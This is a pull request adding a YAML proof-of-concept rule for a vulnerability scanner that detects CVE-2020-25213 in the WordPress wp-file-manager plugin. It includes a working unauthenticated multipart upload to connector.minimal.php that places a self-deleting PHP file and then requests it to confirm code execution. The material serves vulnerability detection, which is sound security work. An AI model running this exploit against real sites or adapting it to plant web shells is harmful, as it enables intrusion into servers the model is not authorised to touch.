### PR TITLE
wordpress-wp-file-manager-rce-cve-2020-25213

### DIFF
--- a/pocs/wordpress-wp-file-manager-rce-cve-2020-25213.yml
+++ b/pocs/wordpress-wp-file-manager-rce-cve-2020-25213.yml
@@ -29,9 +29,9 @@ rules:
     expression: |
       response.status == 200 && response.body.bcontains(bytes(r1))
     search: |
-      "url":"(?P<path>.+?)"}],"removed"
+      "name":"(?P<filename>.+?)","phash"
   - method: GET
-    path: /{{path}}
+    path: /wp-content/plugins/wp-file-manager/lib/files/{{filename}}
     expression: |
       response.status == 200 && response.body.bcontains(bytes(md5(r1)))
 detail:

--- a/pocs/wordpress-wp-file-manager-rce-cve-2020-25213.yml
+++ b/pocs/wordpress-wp-file-manager-rce-cve-2020-25213.yml
@@ -1,0 +1,40 @@
+name: poc-yaml-wordpress-wp-file-manager-rce-cve-2020-25213
+set:
+  r1: randomLowercase(8)
+rules:
+  - method: GET
+    path: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
+    follow_redirects: true
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("errUnknownCmd"))
+  - method: POST
+    path: /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
+    follow_redirects: true
+    headers:
+      Content-Type: multipart/form-data; boundary=f9d5f22616749d6004d075298034bdd0
+    body: |
+      --f9d5f22616749d6004d075298034bdd0
+      Content-Disposition: form-data; name="cmd"
+
+      upload
+      --f9d5f22616749d6004d075298034bdd0
+      Content-Disposition: form-data; name="target"
+
+      l1_
+      --f9d5f22616749d6004d075298034bdd0
+      Content-Disposition: form-data; name="upload[0]"; filename="{{r1}}.php"
+
+      <?php echo md5("{{r1}}");unlink(__FILE__);?>
+      --f9d5f22616749d6004d075298034bdd0--
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(r1))
+    search: |
+      "url":"(?P<path>.+?)"}],"removed"
+  - method: GET
+    path: /{{path}}
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(r1)))
+detail:
+  author: Print1n(http://print1n.top)
+  links:
+    - https://www.cnblogs.com/Salvere-Safe/p/14995249.html


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
CVE-2020-25213 WordPress wp-file-manager 插件远程代码执行漏洞复现
## 测试环境
本地测试
## 备注
对[#1113]()漏洞的完善补充
![image](https://user-images.githubusercontent.com/73928418/126997348-dc6e0cfa-add8-452c-8987-fdbce534d0ea.png)

